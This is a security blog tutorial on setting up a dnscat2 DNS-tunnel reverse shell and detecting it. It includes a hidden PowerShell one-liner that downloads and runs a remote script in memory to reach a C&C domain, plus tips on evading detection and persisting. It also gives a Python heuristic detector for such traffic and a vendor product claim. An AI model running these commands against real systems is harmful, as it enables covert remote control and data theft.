

PowerShell + dnscat2: DNS hidden tunnel reverse shell and its detection

Posted by graebner at 2020-03-16

Readers have probably sat through plenty of lectures on big-data analysis and artificial-intelligence security. How much those architecture diagrams built from dense boxes actually achieve, and how the advanced technology really makes it into products, is rarely explained in any detail. Let's try the common threat tools one by one to make it clear. This series of articles describes advanced threat techniques and tools that are difficult to prevent with traditional security measures, and demonstrates one by one that standardized products with machine-learning capability can be tested against them successfully.

In an intranet environment with a strict security policy, the common C&C communication ports are monitored by many security devices. If the red team compromises a terminal on the target intranet and finds that the network segment only lets whitelisted traffic out, with all other ports blocked, traditional C&C communication cannot be established and getting a reverse shell is very difficult. In this case the red team has one last option: a DNS hidden tunnel carrying the reverse shell. This article demonstrates how the open-source tools dnscat2 and dnscat2-powershell build C&C infrastructure over a DNS hidden tunnel and move data out, bypassing detection by traditional security products.

1. Tools

This demonstration uses two software:

dnscat2 is open-source software that uses the DNS protocol to create an encrypted C&C channel; it provides both a server and a client.

Website: https://github.com/iagox86/dnscat2

dnscat2-powershell is a PowerShell version of the dnscat2 client.

Website: https://github.com/lukebaggett/dnscat2-powershell

The official dnscat2 client on its own can also create a reverse shell: it only requires downloading the Win32 executable to the target terminal and running it locally. Although general anti-virus software does not raise an alarm, it always feels inappropriate. Readers could of course also try to transcode the official client and build an IEX loader for it, but that is another topic, which I plan to write up later. For a simple, easy-to-use demonstration, dnscat2-powershell is better suited to the purpose of this article.

2. Setting up the C&C

First, set up the control infrastructure. The author chose an Alibaba Cloud server running Ubuntu 16.04 as the C&C server, a Windows 10 x64 virtual machine as the data-theft target, and a configurable domain name.

DNS tunnel diagram

Although dnscat2 can also serve direct connections on port 53, to get the best hidden-tunnel effect you need to configure the domain cirrus.[domain]: create an A record that points your own name server (ns.cirrus.[domain]) at the cloud server (IP masked: 3*.1**.*.*); then create an NS record that delegates resolution of the dnsch subdomain to ns.cirrus.[domain].

Install the dnscat2 server on the ECS (IP masked: 3*.1**.*.*). If you are familiar with Ruby and gem, installation is very simple and you can skip the following commands.

Next, install dnscat2 server.

Ruby will prompt you when root permission is needed.

If all goes well, you can enter the following command to start the server:

# sudo ruby ./dnscat2.rb dnsch.cirrus.[domain] -e open -c dnschcirrus --no-cache

Remember to change dnsch.cirrus.[domain] to your own domain name. On the command line, the -c parameter defines the pre-shared secret; using the same secret (here dnschcirrus) on server and client prevents man-in-the-middle attacks, otherwise the transmitted data is not encrypted and can be recovered by a third party monitoring network traffic. If no secret is defined, the dnscat2 server generates one; copy it and use it when starting the client. The -e parameter sets the security level, and the open value lets the client choose. Be sure to add --no-cache when running the server, because the caching mode of the dnscat2-powershell client is not compatible with that of the dnscat2 server.

Without root permission the server cannot listen on port 53, which is the port used by the DNS service.

3. Loading the client on the target host

dnscat2 also has a compiled Windows client; interested readers can download and try it themselves. Using dnscat2-powershell, besides obtaining an interactive reverse shell, relies on PowerShell's standard IEX script-loading pattern to download the script from an external trusted website straight into memory and run it there. Running the client fileless avoids writing anything to disk and reduces the risk of detection. The link given on the official site is:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1')

Readers can also host the content of dnscat2.ps1 on a server trusted by the target network to avoid monitoring.

For the red team, the following client start-up parameters deserve careful attention.

Among them, the delay and maxrandomdelay options are very important for hiding the penetration behaviour; otherwise the DNS tunnel communication is too intensive and easy to spot.

Let's rebuild the PowerShell command into a one-line script, which is easier to use and draws less attention:

powershell.exe -nop -w hidden -c {IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1'); Start-Dnscat2 -Domain dnsch.cirrus.[domain] -PreSharedSecret dnschcirrus}

Note that -PreSharedSecret must be set to the same value as on the server so the communication is encrypted, and that you must substitute your own domain name. Other parameters, such as bypass, can be added according to the reader's needs.

4. Reverse shell over the DNS hidden tunnel

At this point, the server shows the client's online prompt.

Use the windows command to list the control sessions currently open.

At the prompt, enter window -i 9 to switch to the session from tasktop-eqirg2l, then start the shell; commands can now be entered interactively and their output viewed.

I will not go into detail on dnscat2's specific control commands; readers can consult the documentation.

Readers can also try persistence by adding the PowerShell command above to startup execution.

If you use dnscat2's own client on the target terminal, it looks as shown below.

5. Traffic characteristics of the DNS hidden tunnel

Let's look at the tunnel traffic that dnscat2 produces.

It's easy to notice that the queries mainly use CNAME, MX and TXT records.

dnscat2 has a separate server (Ruby) and client (C). Its author implemented a converter that turns all transferred data into a byte stream, so dnscat2 carries a private, layered data-transmission protocol of its own running on top of DNS.

Compared with the Cobalt Strike DNS hidden tunnel discussed in the previous article, dnscat2's home-grown protocol format is noticeably less clear-cut. For example, by default Cobalt Strike sends an A record resolution request in the format [session ID].dnsch.cirrus.[domain] every 60 seconds to check in with the C2 server, uses A record queries to upload data to the server, uses TXT records to download instructions and payloads, and so on.

All data in both the upload and download directions of dnscat2 is transmitted as a hex-encoded string; for example, AAA is encoded as 414141. Any dot in the domain name is ignored, so 41.4141, 414.141 and 414141 are exactly equivalent. In addition, the protocol is case-insensitive, so 5B and 5b are also equivalent (it is important that client and server both handle case).
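As an added example, not code from the original article or from the dnscat2 or dnscat2-powershell projects, the following Python script applies the encoding rules just described (hex payload, dots ignored, case-insensitive) together with the CNAME/MX/TXT record-type observation from the start of this section to a few constructed resolver log lines, and also measures the per-client query rate that the delay options in section 3 are meant to lower. The log line format, the zone name cirrus.example, the two-label zone heuristic and all thresholds are assumptions made for the demonstration.

```python
"""Heuristic detection of dnscat2-style DNS tunnel queries in resolver logs.

Added example for this article; not code from dnscat2 or dnscat2-powershell.
The log format, the zone name "cirrus.example" and every threshold below are
assumptions made for the demonstration.
"""
import re
from collections import defaultdict

# Constructed resolver log lines: "<unix time> <client> <qtype> <qname>".
# The first five mimic dnscat2 traffic towards an assumed zone; the rest are benign.
SAMPLE_LOG = """\
1584352801 10.0.0.5 TXT 3a1f0c.7e2b9d41aa.f0e1d2c3b4.dnsch.cirrus.example
1584352801 10.0.0.5 MX 51ab7e00.21.dnsch.cirrus.example
1584352802 10.0.0.5 CNAME 414141424242434343.dnsch.cirrus.example
1584352802 10.0.0.5 TXT 5B5b5B5b.dnsch.cirrus.example
1584352803 10.0.0.5 TXT 0000ffff.dnsch.cirrus.example
1584352803 10.0.0.7 A www.example.org
1584352804 10.0.0.7 A mail.example.org
1584352805 10.0.0.7 AAAA cdn.example.net
"""

HEX_LABEL = re.compile(r"^[0-9a-fA-F]+$")
TUNNEL_QTYPES = {"CNAME", "MX", "TXT"}  # record types the article observes dnscat2 using
ZONE_LABELS = 2       # assumption: the last two labels are treated as the zone
MIN_PAYLOAD_HEX = 8   # assumption: at least 4 bytes of hex payload per query
MIN_HITS = 3          # assumption: alert once a client/zone pair reaches this many hits


def parse_line(line):
    """Split one log line into a record; the query name is lower-cased."""
    ts, client, qtype, qname = line.split()
    return {"ts": int(ts), "client": client, "qtype": qtype.upper(),
            "qname": qname.rstrip(".").lower()}


def split_zone(qname, zone_labels=ZONE_LABELS):
    """Return (subdomain labels, zone) using a fixed label count, not a suffix list."""
    labels = qname.rstrip(".").split(".")
    return labels[:-zone_labels], ".".join(labels[-zone_labels:])


def hex_payload(qname):
    """Join the leading hex-only labels of the subdomain, lower-cased.

    Mirrors the dnscat2 encoding rules in the article: dots carry no meaning and
    hex digits are case-insensitive, so 41.4141, 414.141 and 414141 all give
    the same payload.
    """
    sub, _ = split_zone(qname)
    chunks = []
    for label in sub:
        if not HEX_LABEL.match(label):
            break
        chunks.append(label.lower())
    return "".join(chunks)


def decode_payload(qname):
    """Decode the hex payload of a query name back into the carried bytes."""
    return bytes.fromhex(hex_payload(qname))


def is_suspicious(rec):
    """Tunnel-capable record type plus a whole number of payload bytes over the threshold."""
    payload = hex_payload(rec["qname"])
    return (rec["qtype"] in TUNNEL_QTYPES
            and len(payload) >= MIN_PAYLOAD_HEX
            and len(payload) % 2 == 0)


def records(log_text):
    return [parse_line(line) for line in log_text.splitlines() if line.strip()]


def analyze(log_text):
    """Count suspicious queries per (client, zone); keep pairs at or above MIN_HITS."""
    hits = defaultdict(int)
    for rec in records(log_text):
        if is_suspicious(rec):
            _, zone = split_zone(rec["qname"])
            hits[(rec["client"], zone)] += 1
    return {key: n for key, n in hits.items() if n >= MIN_HITS}


def query_rate(log_text):
    """Queries per second per (client, zone) over the span seen in the log.
    A client that never pauses between tunnel packets stands out here."""
    first, last, count = {}, {}, defaultdict(int)
    for rec in records(log_text):
        key = (rec["client"], split_zone(rec["qname"])[1])
        first.setdefault(key, rec["ts"])
        last[key] = max(last.get(key, rec["ts"]), rec["ts"])
        count[key] += 1
    return {key: count[key] / (last[key] - first[key] + 1) for key in count}


if __name__ == "__main__":
    rates = query_rate(SAMPLE_LOG)
    for (client, zone), n in analyze(SAMPLE_LOG).items():
        print(f"{client} -> {zone}: {n} tunnel-like queries, {rates[(client, zone)]:.2f} q/s")
```

On the constructed log, only the 10.0.0.5 / cirrus.example pair is reported (five hits at about 1.7 queries per second), while the benign A and AAAA lookups are ignored. Hex-looking labels do occur legitimately (CDN object hashes, DKIM selectors), which is why the rule requires a tunnel-capable record type, a minimum payload length and a sustained count before alerting; a production detector would replace the fixed two-label zone split with a public suffix list and baseline each client's normal query rate rather than using constant thresholds.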

It must be added here that the author has skimmed the dnscat2 code and found that its communication fault-tolerance and error-correction mechanisms are not complete, so there is a good chance of unstable operation. Interested readers can modify and optimize it to improve reliability and add more ability to evade detection.

DNS covert tunnel detection is a key technology for identifying unknown threats. The aftermath of the POS Trojan that shook the retail industry is still spreading, and giants such as Home Depot and Target have paid a heavy price. In that incident, the rampant FrameworkPOS Trojan used a DNS covert channel to send data back, uploading the credit-card data it found in memory to its server. The specific format is as follows:

Last year, the widely reported trojanization of the Xshell software also used DGA and DNS tunneling techniques:

There is no doubt that Scarlett's standard DLP and NTA products are able to detect the dnscat2 reverse shell accurately; the alarm screenshot is as follows:

This series of tutorials introduces the techniques, tactics and tools used in common external intrusions and insider threats, and gives practical methods for detecting and responding to them with existing mature products.